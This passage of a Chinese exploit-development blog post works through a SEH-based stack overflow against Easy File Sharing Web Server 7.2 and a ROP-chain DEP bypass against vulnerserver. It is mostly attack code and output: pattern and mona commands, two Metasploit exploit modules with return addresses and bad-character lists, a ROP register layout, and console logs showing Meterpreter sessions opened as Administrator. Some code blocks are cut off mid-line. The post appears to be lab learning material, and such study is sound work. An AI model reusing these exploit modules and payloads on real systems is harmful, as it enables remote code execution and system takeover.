<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p>
|
|||
|
</blockquote>
|
|||
|
<h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
|
|||
|
<li>生成字符序列<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create<span class="selector-class">.rb</span> -l <span class="number">10000</span> > <span class="selector-tag">a</span>.txt</span><br><span class="line">python -c <span class="string">"print(' HTTP/1.0\r\n\r\n')"</span> > <span class="selector-tag">b</span>.txt</span><br><span class="line">cat <span class="selector-tag">a</span><span class="selector-class">.txt</span> <span class="selector-tag">b</span><span class="selector-class">.txt</span> > c.txt</span><br></pre></td></tr></table></figure>
|
|||
|
</li>
|
|||
|
</ol>
|
|||
|
<p>删除cat造成的多余字符0x0a<br><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"><span class="comment"># In Vim</span></span><br><span class="line"><span class="symbol">:%</span>!xxd</span><br><span class="line"><span class="comment"># After editing, use the instruction below to save</span></span><br><span class="line"><span class="symbol">:%</span>!xxd -r</span><br></pre></td></tr></table></figure></p>
|
|||
|
<ol start="2">
|
|||
|
<li>构造SEH链</li>
|
|||
|
</ol>
|
|||
|
<ul>
|
|||
|
<li>将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中,并处于运行状态。</li>
|
|||
|
<li>发送溢出字符序列</li>
|
|||
|
<li>查看Easy File Sharing Web Server 7.2溢出地址<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/231.png" alt></li>
|
|||
|
</ul>
|
|||
|
<ol start="3">
|
|||
|
<li>计算偏移量<br>计算catch块偏移量&计算下一条SEH记录偏移量</li>
|
|||
|
</ol>
|
|||
|
<h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol>
|
|||
|
<li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址,并跳转到攻击载荷<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="addition">!mona modules</span></span><br><span class="line"><span class="addition">!mona seh</span></span><br></pre></td></tr></table></figure>
|
|||
|
</li>
|
|||
|
</ol>
|
|||
|
<h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol>
|
|||
|
<li><p>编写攻击脚本</p>
|
|||
|
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'Space'</span> => <span class="number">390</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line"> {</span><br><span class="line"> <span class="string">'Ret'</span> => <span class="number">0x10022fd
|
|||
|
</li>
|
|||
|
<li><p>exploit</p>
|
|||
|
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > <span class="keyword">set</span> rhosts <span class="comment">192.168.31.114</span></span><br><span class="line">rhosts <span class="comment">=> 192.168.31.114</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) > set rport 80</span></span><br><span class="line">rport <span class="comment">=> 80</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) > exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">reverse TCP handler on 192.168.31.84:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) > set payload windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">payload <span class="comment">=> windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) > exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Sending <span class="comment">stage (179779 bytes) to 192.168.31.114</span></span><br><span class="line">[*] Meterpreter <span class="comment">session 1 opened (192.168.31.84:46601 -> 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span></span><br><span class="line"></span><br><span class="line">meterpreter <span class="comment">> getuid</span></span><br><span class="line">Server <span class="comment">username: WHU-3E3EECEBFD1\Administrator</span></span><br></pre></td></tr></table></figure>
|
|||
|
</li>
|
|||
|
</ol>
|
|||
|
<h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote>
|
|||
|
<p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p>
|
|||
|
</blockquote>
|
|||
|
<h2 id="设置DEP保护"><a href="#设置DEP保护" class="headerlink" title="设置DEP保护"></a>设置DEP保护</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/%E6%8D%9511%E8%8E%B7.png" alt><br><em>构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode</em></p>
|
|||
|
<h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>'TRUN .'+make_nops(target['Offset'])</code><br>Immunity附加进程之后,在服务端发送3000个字符,计算偏移</p>
|
|||
|
<h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span
|
|||
|
<h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'space'</span> => <s
|
|||
|
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > <span class="keyword">set</span> rhosts <span class="comment">192.168.31.114</span></span><br><span class="line">rhosts <span class="comment">=> 192.168.31.114</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) > set rport 1000</span></span><br><span class="line">rport <span class="comment">=> 1000</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) > exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">reverse TCP handler on 192.168.31.84:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) > set payload windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">payload <span class="comment">=> windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) > exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) > exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Sending <span class="comment">stage (179779 bytes) to 192.168.31.114</span></span><br><span class="line">[*] Meterpreter <span class="comment">session 1 opened (192.168.31.84:44537 -> 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span></span><br><span class="line"></span><br><span class="line">meterpreter <span class="comment">> getuid</span></span><br><span class="line">Server <span class="comment">username: WHU-3E3EECEBFD1\Administrator</span></span><br></pre></td></tr></table></figure>
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div>
|
|||
|
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
|
|||
|
<div>您的支持将鼓励我继续创作!</div>
|
|||
|
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
|
|||
|
<span>打赏</span>
|
|||
|
</button>
|
|||
|
<div id="QR" style="display: none;">
|
|||
|
|
|||
|
|
|||
|
<div id="wechat" style="display: inline-block">
|
|||
|
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
|
|||
|
<p>微信支付</p>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div id="alipay" style="display: inline-block">
|
|||
|
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
|
|||
|
<p>支付宝</p>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<footer class="post-footer">
|
|||
|
|
|||
|
<div class="post-tags">
|
|||
|
|
|||
|
<a href="/tags/二进制/" rel="tag"># 二进制</a>
|
|||
|
|
|||
|
<a href="/tags/Windows/" rel="tag"># Windows</a>
|
|||
|
|
|||
|
<a href="/tags/漏洞/" rel="tag"># 漏洞</a>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-nav">
|
|||
|
<div class="post-nav-next post-nav-item">
|
|||
|
|
|||
|
<a href="/2019/07/09/afl-first-try/" rel="next" title="AFL-爱之初体验">
|
|||
|
<i class="fa fa-chevron-left"></i> AFL-爱之初体验
|
|||
|
</a>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
<span class="post-nav-divider"></span>
|
|||
|
|
|||
|
<div class="post-nav-prev post-nav-item">
|
|||
|
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</footer>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</article>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-spread">
|
|||
|
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="comments" id="comments">
|
|||
|
|
|||
|
<div id="gitment-container"></div>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="sidebar-toggle">
|
|||
|
<div class="sidebar-toggle-line-wrap">
|
|||
|
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
|
|||
|
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
|
|||
|
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
<aside id="sidebar" class="sidebar">
|
|||
|
|
|||
|
<div class="sidebar-inner">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<ul class="sidebar-nav motion-element">
|
|||
|
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
|
|||
|
文章目录
|
|||
|
</li>
|
|||
|
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
|
|||
|
站点概览
|
|||
|
</li>
|
|||
|
</ul>
|
|||
|
|
|||
|
|
|||
|
<section class="site-overview-wrap sidebar-panel">
|
|||
|
<div class="site-overview">
|
|||
|
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
|
|||
|
|
|||
|
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
|
|||
|
|
|||
|
<p class="site-author-name" itemprop="name">Cool-Y</p>
|
|||
|
<p class="site-description motion-element" itemprop="description"></p>
|
|||
|
</div>
|
|||
|
|
|||
|
<nav class="site-state motion-element">
|
|||
|
|
|||
|
|
|||
|
<div class="site-state-item site-state-posts">
|
|||
|
|
|||
|
<a href="/archives/">
|
|||
|
|
|||
|
<span class="site-state-item-count">18</span>
|
|||
|
<span class="site-state-item-name">日志</span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="site-state-item site-state-categories">
|
|||
|
<a href="/categories/index.html">
|
|||
|
<span class="site-state-item-count">6</span>
|
|||
|
<span class="site-state-item-name">分类</span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="site-state-item site-state-tags">
|
|||
|
<a href="/tags/index.html">
|
|||
|
<span class="site-state-item-count">36</span>
|
|||
|
<span class="site-state-item-name">标签</span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
</nav>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="links-of-author motion-element">
|
|||
|
|
|||
|
<span class="links-of-author-item">
|
|||
|
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
|
|||
|
|
|||
|
<i class="fa fa-fw fa-github"></i>GitHub</a>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="links-of-author-item">
|
|||
|
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
|
|||
|
|
|||
|
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="links-of-author-item">
|
|||
|
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
|
|||
|
|
|||
|
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
|
|||
|
</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</section>
|
|||
|
|
|||
|
|
|||
|
<!--noindex-->
|
|||
|
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
|
|||
|
<div class="post-toc">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-漏洞利用开发简介"><span class="nav-text">0x00 漏洞利用开发简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简单栈溢出"><span class="nav-text">0x01 简单栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞点"><span class="nav-text">漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关闭防御措施"><span class="nav-text">关闭防御措施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#整体的攻击流程:"><span class="nav-text">整体的攻击流程:</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找jmp-esp跳板"><span class="nav-text">寻找jmp esp跳板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于SEH的栈溢出"><span class="nav-text">0x02 基于SEH的栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置-1"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找PPR"><span class="nav-text">寻找PPR</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-1"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-绕过DEP"><span class="nav-text">0x03 绕过DEP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#设置DEP保护"><span class="nav-text">设置DEP保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#计算偏移量"><span class="nav-text">计算偏移量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建ROP链"><span class="nav-text">创建ROP链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-2"><span class="nav-text">自动化攻击</span></a></li></ol></li></ol></div>
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</section>
|
|||
|
<!--/noindex-->
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</aside>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</main>
|
|||
|
|
|||
|
<footer id="footer" class="footer">
|
|||
|
<div class="footer-inner">
|
|||
|
<div class="copyright">© <span itemprop="copyrightYear">2019</span>
|
|||
|
<span class="with-love">
|
|||
|
<i class="fa fa-user"></i>
|
|||
|
</span>
|
|||
|
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-area-chart"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span title="Site words total count">49.9k</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="busuanzi-count">
|
|||
|
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
|
|||
|
|
|||
|
|
|||
|
<span class="site-uv">
|
|||
|
<i class="fa fa-user"></i>
|
|||
|
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span class="site-pv">
|
|||
|
<i class="fa fa-eye"></i>
|
|||
|
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</footer>
|
|||
|
|
|||
|
|
|||
|
<div class="back-to-top">
|
|||
|
<i class="fa fa-arrow-up"></i>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript">
|
|||
|
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
|
|||
|
window.Promise = null;
|
|||
|
}
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
